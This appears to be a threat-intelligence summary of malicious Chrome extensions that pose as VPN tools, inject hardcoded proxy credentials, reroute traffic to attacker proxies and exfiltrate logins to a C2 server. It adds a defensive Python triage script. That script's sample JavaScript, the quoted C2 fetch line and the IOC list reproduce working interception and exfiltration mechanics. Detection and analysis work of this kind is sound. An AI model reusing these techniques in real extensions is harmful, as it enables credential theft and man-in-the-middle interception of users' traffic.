Socket’s Threat Research Team discovered two malicious Chrome extensions named Phantom Shuttle (幻影穿梭) that pose as paid multi-location network speed test/VPN tools while injecting hardcoded proxy credentials and routing targeted traffic through attacker-controlled proxies. The extensions perform continuous credential exfiltration and man-in-the-middle data capture via a 60-second heartbeat and proxy infrastructure at phantomshuttle.space using the credentials topfany/963852wei. #PhantomShuttle #phantomshuttle.space
Keypoints
- Two Chrome extensions named Phantom Shuttle (幻影穿梭) distributed since at least 2017 by the same actor (registration email theknewone.com@gmail[.]com) are marketed as paid VPN/proxy tools and have over 2,180 users.
- Both extensions prepend malicious code to legitimate jquery-1.12.2.min.js and scripts.js to decode and inject hardcoded proxy credentials (topfany / 963852wei) into all HTTP authentication challenges via chrome.webRequest.onAuthRequired.
- The extensions configure Chrome proxy settings with a PAC script and a “smarty” mode that routes traffic for 170+ high-value domains (developer, cloud, corporate, social, and adult sites) through attacker-controlled proxies, enabling MITM interception.
- A persistent heartbeat and VIP status checks transmit user email and plaintext passwords to a C2 at phantomshuttle[.]space (heartbeat every 60s, data sent every 5 minutes), and the extension responds to remote commands to enable/disable proxy modes.
- Data exfiltration channels include initial configuration fetches, heartbeat API calls, and continuous proxy traffic capture (credentials, session cookies, POST data, API keys, payment data), with persistent storage in chrome.storage.local.
- Infrastructure analysis shows the C2 domain phantomshuttle[.]space (registered 2017) resolving to 47[.]244[.]125[.]55 on Alibaba Cloud, using Cloudflare and active API endpoints; takedown requests have been submitted to Google.
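As an added example (not Socket's code and not the extension's own), a small Python triage routine that flags an unpacked extension showing the capability combination the key points describe: proxy control together with HTTP-auth handling permissions, an onAuthRequired listener returning authCredentials, a PAC-script proxy setting, and a 60-second timer. The manifest and script it scans are constructed samples; the extension IDs come from the indicators on this page.

```python
import re

# Extension IDs named in the report.
KNOWN_BAD_IDS = {"fbfldogmkadejddihifklefknmikncaj", "ocpcmfmiidofonkbodpdhgddhlcmcofd"}

# Permissions that let an extension answer proxy auth challenges on the user's
# behalf (MV2 uses webRequestBlocking, MV3 uses webRequestAuthProvider).
AUTH_PERMS = {"webRequest", "webRequestBlocking", "webRequestAuthProvider"}

# Source-level patterns matching the behaviour described in the report.
PATTERNS = {
    "auth_injection": re.compile(r"onAuthRequired[\s\S]{0,400}?authCredentials"),
    "pac_proxy": re.compile(r"proxy\.settings\.set[\s\S]{0,400}?pac_script"),
    "heartbeat_60s": re.compile(r"setInterval\([\s\S]{0,200}?\b60000\b"),
}

def triage(ext_id, manifest, scripts):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    if ext_id in KNOWN_BAD_IDS:
        findings.append("known_malicious_id")
    perms = set(manifest.get("permissions", []))
    # Proxy control plus auth handling is the combination that enables silent
    # re-routing through a credentialed attacker proxy.
    if "proxy" in perms and perms & AUTH_PERMS:
        findings.append("proxy_with_auth:" + ",".join(sorted(perms & AUTH_PERMS)))
    for name, src in scripts.items():
        for label, rx in PATTERNS.items():
            if rx.search(src):
                findings.append(f"{label}:{name}")
    return findings

# Constructed sample input (not the real extension's code) exercising each check.
SAMPLE_MANIFEST = {"manifest_version": 2,
                   "permissions": ["proxy", "webRequest", "webRequestBlocking", "storage"]}
SAMPLE_SCRIPTS = {"scripts.js": """
chrome.webRequest.onAuthRequired.addListener(function (details) {
  return { authCredentials: { username: user, password: pass } };
}, { urls: ["<all_urls>"] }, ["blocking"]);
chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { data: pac } },
                            scope: "regular" });
setInterval(heartbeat, 60000);
"""}

if __name__ == "__main__":
    for finding in triage("fbfldogmkadejddihifklefknmikncaj", SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print(finding)
```

Legitimate proxy extensions will also trip the permission and PAC checks, so treat hits as triage leads for manual review rather than verdicts.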
MITRE Techniques
- [T1176] Browser Extensions – Used as the delivery and execution vehicle for malicious code and persistent functionality within the browser. ("Ready to use, simple setup, a simulated multi-location network speed testing plugin for developers and foreign trade personnel.")
- [T1557] Adversary-in-the-Middle – Achieves a man-in-the-middle position by routing targeted domain traffic through attacker-controlled proxies authenticated with injected credentials. ("operate as man-in-the-middle proxies")
- [T1090.002] Proxy: External Proxy – Configures PAC scripts and proxy settings to route traffic for 170+ targeted domains through external proxies controlled by the threat actor. ("route traffic from 170+ targeted domains through the C2 infrastructure.")
- [T1539] Steal Web Session Cookie – Extracts session cookies from HTTP headers when traffic is proxied, enabling session hijacking and account takeover. ("Session cookie theft from HTTP headers")
- [T1056.003] Input Capture: Web Portal Capture – Captures form inputs and credentials submitted to proxied sites (passwords, credit card numbers, form data). ("All passwords typed into login forms")
- [T1027] Obfuscated Files or Information – Hides hardcoded credentials and endpoints using a custom character-index encoding and the jerry() decoding function to evade simple static analysis. ("This obfuscates the credentials topfany / 963852wei from basic static analysis.")
- [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTP(S) fetch calls for configuration, heartbeat, and command-and-control communications to exfiltrate data and receive instructions. (`fetch(decodedApiUrl, { method: "GET", body: JSON.stringify(payload) })`)
- [T1573] Encrypted Channel – Uses HTTPS with valid SSL certificates on port 443 for C2 communications to present a legitimate appearance and protect transport. ("The server responds to HTTPS requests on port 443 with valid SSL certificates")
Indicators of Compromise
- [Chrome Extension Name / ID] Malicious extension identifiers – Phantom Shuttle (幻影穿梭) – fbfldogmkadejddihifklefknmikncaj, ocpcmfmiidofonkbodpdhgddhlcmcofd
- [Version] Extension version observed – 3.1.9
- [Registration Email] Threat actor contact – theknewone.com@gmail[.]com
- [Domain] C2 domain and API endpoint – phantomshuttle[.]space, https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server
- [IP Address] Hosting infrastructure – 47[.]244[.]125[.]55 (Alibaba Cloud, Hong Kong)
- [Credentials] Hardcoded proxy credentials used for authentication – topfany / 963852wei
Read more: https://socket.dev/blog/malicious-chrome-extensions-phantom-shuttle